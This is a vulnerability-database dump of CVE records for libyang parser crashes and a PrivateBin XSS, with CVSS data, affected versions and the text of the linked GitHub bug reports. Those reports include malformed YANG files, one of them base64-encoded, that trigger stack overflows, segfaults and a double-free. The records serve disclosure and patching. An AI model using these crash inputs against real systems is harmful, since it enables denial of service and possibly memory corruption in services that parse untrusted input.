"versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.13:r1:*:*:*:*:*:*", "matchCriteriaId": "35D48EC4-58D2-49C6-8049-920787733587", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.13:r2:*:*:*:*:*:*", "matchCriteriaId": "B57F3953-49D6-413C-A4AE-03125935FC77", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.14:r1:*:*:*:*:*:*", "matchCriteriaId": "DD62411F-A524-4E80-B540-780EA39CB6A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.15:r1:*:*:*:*:*:*", "matchCriteriaId": "FEF091B1-978A-4881-B1FC-6848CD1A7BBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r1:*:*:*:*:*:*", "matchCriteriaId": "0C50D690-9A4D-4B78-BF4E-A4D9B4074216", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r2:*:*:*:*:*:*", "matchCriteriaId": "124A5D30-7451-4516-9AA2-963AE62DD679", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r3:*:*:*:*:*:*", "matchCriteriaId": "C260D13B-82E9-4596-9116-61073B42D661", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "674" ]
674
https://github.com/CESNET/libyang/issues/724
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CESNET", "libyang" ]
Hi, the following yang file causes a segmentation fault in lys_parse_path, caused by a stack overflow due to too many function calls. ``` module mod1 { namespace "urn:all"; prefix av; yang-version 1.1; leaf l1 { type union-type; } leaf-list list5 { type string; } typedef union-type { type union { type leafref { path /list5; } type union-type; } } } ``` The issue seems to be caused due to the self-referential union-type type containing a leaf-ref. If the list5 leaf-list is removed, the issue persists, but the stack overflow takes longer to appear. A gdb backtrace shows that the call stack is full of lys_copy_union_leafrefs calls, called in src/tree_schema.c:1903 and src/tree_schema.c:1887. Regards, Juraj
Segmentation fault due to self-refential union type containing leafrefs
https://api.github.com/repos/CESNET/libyang/issues/724/comments
4
2019-03-08T10:26:25Z
2020-01-23T09:15:53Z
https://github.com/CESNET/libyang/issues/724
418,726,165
724
1,025
CVE-2019-20396
2020-01-22T22:15:10.470
A segmentation fault is present in yyparse in libyang before v1.0-r1 due to a malformed pattern statement value during lys_parse_path parsing.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/commit/a1f17693904ed6fecc8902c747fc50a8f20e6af8" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/compare/v0.16-r3...v1.0-r1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/740" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00019.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/commit/a1f17693904ed6fecc8902c747fc50a8f20e6af8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/compare/v0.16-r3...v1.0-r1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/740" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00019.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesnet:libyang:0.11:r1:*:*:*:*:*:*", "matchCriteriaId": "65E91322-5F67-43C2-8112-5ECAEC2A3C12", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.11:r2:*:*:*:*:*:*", "matchCriteriaId": "80A88DE4-93F8-40C3-AA52-A5F353F028AA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.12:r1:*:*:*:*:*:*", "matchCriteriaId": "05C120CA-50EF-4B6D-92C9-ED736219DB07", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.12:r2:*:*:*:*:*:*", "matchCriteriaId": "99D1FA55-3F56-4E09-B41E-B05C199B96B8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.13:r1:*:*:*:*:*:*", "matchCriteriaId": "35D48EC4-58D2-49C6-8049-920787733587", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.13:r2:*:*:*:*:*:*", "matchCriteriaId": "B57F3953-49D6-413C-A4AE-03125935FC77", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.14:r1:*:*:*:*:*:*", "matchCriteriaId": "DD62411F-A524-4E80-B540-780EA39CB6A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.15:r1:*:*:*:*:*:*", "matchCriteriaId": "FEF091B1-978A-4881-B1FC-6848CD1A7BBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r1:*:*:*:*:*:*", "matchCriteriaId": "0C50D690-9A4D-4B78-BF4E-A4D9B4074216", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r2:*:*:*:*:*:*", "matchCriteriaId": "124A5D30-7451-4516-9AA2-963AE62DD679", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r3:*:*:*:*:*:*", "matchCriteriaId": "C260D13B-82E9-4596-9116-61073B42D661", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/CESNET/libyang/issues/740
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CESNET", "libyang" ]
Hello, this file crashes libyang when it is parsed with lys_parse_path: ``` module xpath-1.1 { namespace "urn:xpath-1.1"; prefix xp; container top { leaf identref { type mdentityref { base:iwo; pattern '[A-Z]+'; pattern '[A-Z]+'; pattern '[A-Z]+'; pattern '[A-Z]+'; pattern '[./key2, 2, 3), 'a') and not(starts-with(./key2, 'a')))"; } ``` Regards, Juraj
Segmentation fault in yyparse due to malformed pattern statement value
https://api.github.com/repos/CESNET/libyang/issues/740/comments
1
2019-03-29T10:38:30Z
2020-01-23T09:16:18Z
https://github.com/CESNET/libyang/issues/740
426,922,796
740
1,026
CVE-2019-20397
2020-01-22T22:15:10.550
A double-free is present in libyang before v1.0-r1 in the function yyparse() when an organization field is not terminated. Applications that use libyang to parse untrusted input yang files may be vulnerable to this flaw, which would cause a crash or potentially code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793928" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/commit/88bd6c548ba79bce176cd875e9b56e7e0ef4d8d4" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/compare/v0.16-r3...v1.0-r1" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/739" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00019.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793928" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/commit/88bd6c548ba79bce176cd875e9b56e7e0ef4d8d4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/compare/v0.16-r3...v1.0-r1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/739" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00019.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesnet:libyang:0.11:r1:*:*:*:*:*:*", "matchCriteriaId": "65E91322-5F67-43C2-8112-5ECAEC2A3C12", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.11:r2:*:*:*:*:*:*", "matchCriteriaId": "80A88DE4-93F8-40C3-AA52-A5F353F028AA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.12:r1:*:*:*:*:*:*", "matchCriteriaId": "05C120CA-50EF-4B6D-92C9-ED736219DB07", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.12:r2:*:*:*:*:*:*", "matchCriteriaId": "99D1FA55-3F56-4E09-B41E-B05C199B96B8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.13:r1:*:*:*:*:*:*", "matchCriteriaId": "35D48EC4-58D2-49C6-8049-920787733587", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.13:r2:*:*:*:*:*:*", "matchCriteriaId": "B57F3953-49D6-413C-A4AE-03125935FC77", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.14:r1:*:*:*:*:*:*", "matchCriteriaId": "DD62411F-A524-4E80-B540-780EA39CB6A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.15:r1:*:*:*:*:*:*", "matchCriteriaId": "FEF091B1-978A-4881-B1FC-6848CD1A7BBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r1:*:*:*:*:*:*", "matchCriteriaId": "0C50D690-9A4D-4B78-BF4E-A4D9B4074216", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r2:*:*:*:*:*:*", "matchCriteriaId": "124A5D30-7451-4516-9AA2-963AE62DD679", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r3:*:*:*:*:*:*", "matchCriteriaId": "C260D13B-82E9-4596-9116-61073B42D661", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "415" ]
415
https://github.com/CESNET/libyang/issues/739
[ "Third Party Advisory" ]
github.com
[ "CESNET", "libyang" ]
Hello, this file crashes lys_parse_path: ``` module ietf-datastores { yang-version 1.1; namespace "udn:ietf:params:xml:ns:yang:ietf-datastores"; prefix ds; organization "IETF Network Modeling (NETMOD) Working Group"+ iper.net> } ``` Regards, Juraj
Heap corruption due to invalid unterminated organization field in YANG file
https://api.github.com/repos/CESNET/libyang/issues/739/comments
1
2019-03-28T09:31:50Z
2020-01-23T09:16:06Z
https://github.com/CESNET/libyang/issues/739
426,387,403
739
1,027
CVE-2019-20398
2020-01-22T22:15:10.627
A NULL pointer dereference is present in libyang before v1.0-r3 in the function lys_extension_instances_free() due to a copy of unresolved extensions in lys_restr_dup(). Applications that use libyang to parse untrusted input yang files may crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793935" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/CESNET/libyang/commit/7852b272ef77f8098c35deea6c6f09cb78176f08" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/compare/v1.0-r2...v1.0-r3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/773" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00019.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793935" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/CESNET/libyang/commit/7852b272ef77f8098c35deea6c6f09cb78176f08" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/compare/v1.0-r2...v1.0-r3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/773" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00019.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesnet:libyang:0.11:r1:*:*:*:*:*:*", "matchCriteriaId": "65E91322-5F67-43C2-8112-5ECAEC2A3C12", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.11:r2:*:*:*:*:*:*", "matchCriteriaId": "80A88DE4-93F8-40C3-AA52-A5F353F028AA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.12:r1:*:*:*:*:*:*", "matchCriteriaId": "05C120CA-50EF-4B6D-92C9-ED736219DB07", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.12:r2:*:*:*:*:*:*", "matchCriteriaId": "99D1FA55-3F56-4E09-B41E-B05C199B96B8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.13:r1:*:*:*:*:*:*", "matchCriteriaId": "35D48EC4-58D2-49C6-8049-920787733587", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.13:r2:*:*:*:*:*:*", "matchCriteriaId": "B57F3953-49D6-413C-A4AE-03125935FC77", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.14:r1:*:*:*:*:*:*", "matchCriteriaId": "DD62411F-A524-4E80-B540-780EA39CB6A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.15:r1:*:*:*:*:*:*", "matchCriteriaId": "FEF091B1-978A-4881-B1FC-6848CD1A7BBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r1:*:*:*:*:*:*", "matchCriteriaId": "0C50D690-9A4D-4B78-BF4E-A4D9B4074216", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r2:*:*:*:*:*:*", "matchCriteriaId": "124A5D30-7451-4516-9AA2-963AE62DD679", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r3:*:*:*:*:*:*", "matchCriteriaId": "C260D13B-82E9-4596-9116-61073B42D661", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:1.0:r1:*:*:*:*:*:*", "matchCriteriaId": "5F8D5FC0-959E-4014-9CB7-91378CC8B2BA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:1.0:r2:*:*:*:*:*:*", "matchCriteriaId": "DCBDA519-805B-4193-8092-75E2748A7BC3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/CESNET/libyang/issues/773
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CESNET", "libyang" ]
Hi, this file crashes yanglint due to unprintable characters at the end of the file. Shortening the error message string removes the crash too, so I guess both issues are relevant. ``` module n00 { yang-version 1.1; namespace "urn:all"; prefix all_mod; container cont1 { uses group1 { } } grouping group1 { leaf leaf1 { type int64 { range "1000 .. 50000" { error-meeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeaeeeeeeeeeeeeeeeee:eeeeeeeeeeeeeeeeeeeeeeeressage "Spec"; } } } } }^@^@^C<E8> leaf-list llist1 { ``` Here is the file base64 encoded: ``` bW9kdWxlIG4wMCB7Cgl5YW5nLXZlcnNpb24gMS4xOwogIAluYW1lc3BhY2UgInVybjphbGwiOwog IAlwcmVmaXggYWxsX21vZDsKCiAgCWNvbnRhaW5lciBjb250MSB7CiAgICAJdXNlcyBncm91cDEg ewogICAgCX0KICAJfQoKICAJZ3JvdXBpbmcgZ3JvdXAxIHsKICAgIAlsZWFmIGxlYWYxIHsKICAg ICAgIAkJdHlwZSBpbnQ2NCB7CiAgICAgICAgCQlyYW5nZSAiMTAwMCAuLiA1MDAwMCIgewogICAg ICAgICAgCQkJZXJyb3ItbWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVl ZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVhZWVlZWVlZWVlZWVl ZWVlZWU6ZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVyZXNzYWdlCiAgICAgICAgICAgIAkJIlNwZWMi OwogICAgICAgIAkJfQogICAgICAJCX0KICAgIAl9CiAgICB9Cn0AAAPoICBsZWFmLWxpc3QgbGxp c3QxIHsK ``` I've encoded the file with b64, rather than using the xxd output, since I assume decoding b64 is somewhat easier than creating the file from xxd. If you would prefer another format for files containing binary data, please let me know.
Segmentation fault in yanglint and yangfuzz due to unprintable characters
https://api.github.com/repos/CESNET/libyang/issues/773/comments
1
2019-04-29T13:21:12Z
2020-01-23T09:17:06Z
https://github.com/CESNET/libyang/issues/773
438,312,481
773
1,028
CVE-2020-5223
2020-01-23T02:15:13.423
In PrivateBin versions 1.2.0 before 1.2.2, and 1.3.0 before 1.3.2, a persistent XSS attack is possible. Under certain conditions, a user provided attachment file name can inject HTML leading to a persistent Cross-site scripting (XSS) vulnerability. The vulnerability has been fixed in PrivateBin v1.3.2 & v1.2.2. Admins are urged to upgrade to these versions to protect the affected users.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:H/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 4.7, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/PrivateBin/PrivateBin/commit/8d0ac336d23cd8c98e71d5f21cdadcae9c8a26e6" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/PrivateBin/PrivateBin/issues/554" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-8j72-p2wm-6738" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://privatebin.info/news/v1.3.2-v1.2.2-release.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/PrivateBin/PrivateBin/commit/8d0ac336d23cd8c98e71d5f21cdadcae9c8a26e6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/PrivateBin/PrivateBin/issues/554" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-8j72-p2wm-6738" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://privatebin.info/news/v1.3.2-v1.2.2-release.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:privatebin:privatebin:*:*:*:*:*:*:*:*", "matchCriteriaId": "F1889EB9-8FB8-467F-B66C-4649A5B9373E", "versionEndExcluding": "1.2.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.2", "vulnerable": true }, { "criteria": "cpe:2.3:a:privatebin:privatebin:*:*:*:*:*:*:*:*", "matchCriteriaId": "8D8FFA77-8158-4989-AE2C-1AAD126F3196", "versionEndExcluding": "1.3.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.3", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/PrivateBin/PrivateBin/issues/554
[ "Third Party Advisory" ]
github.com
[ "PrivateBin", "PrivateBin" ]
